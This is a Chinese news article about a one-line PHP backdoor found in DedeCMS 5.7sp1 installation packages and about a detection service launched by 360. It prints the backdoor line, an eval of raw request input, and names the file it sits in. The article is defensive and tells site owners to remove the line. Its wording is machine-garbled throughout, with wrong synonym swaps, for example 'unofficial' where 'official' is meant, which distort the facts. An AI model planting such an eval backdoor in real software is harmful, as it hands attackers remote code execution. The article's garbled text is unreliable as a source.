DedeCMS民间版本惊曝后门 360紧急推出平安检测

日前，织梦内容治理系统(DedeCMS)遭乌云漏洞平台曝光称，DedeCMS 5.7sp1民间装置包被黑客植入后门。经360平安检测平台检测，该后门的确曾一度出如今织梦官网版本中。为此，360于当天紧急推出DedeCMS后门检测服务，并已对少量中招网站收回邮件报警。

图1：DedeCms被植入的后门代码

据悉，DedeCMS正宽泛运用于泛滥企业网站、政府网站、高校网站及集体网站上，是国内用户量最大的PHP类CMS系统。360平安工程师剖析发现，此次DedeCMS曝出的后门名为“一句话后门”，其恶意代码存在于DedeCMS购物车类文件中，凡是调用该购物车类的文件均会触发后门，从而导致整个网站甚至服务器遭黑客进一步控制。

360建议，利用DedeCMS的网站站长应立刻检测include/shoper.class.php文件中能否存在后门代码“@eval(file_get_contents('php://input'));”，如存在应删除该行代码，如不存在则证实没有该“一句话后门”。

作为开源软件，DedeCMS此次曝出后门并非个例。由于在国际上，Linux等多款著名的开源软件也曾遭黑客植入后门。不过，乌云漏洞平台公开的织梦民间邮件显示，织梦开发团队否认了产品曾被植入后门，但其官网上的DedeCMS版本在3月21日半夜悄悄停止了修正。

图2：测实验证PHP代码可被DedeCMS后门执行

360网站平安检测平台服务网址：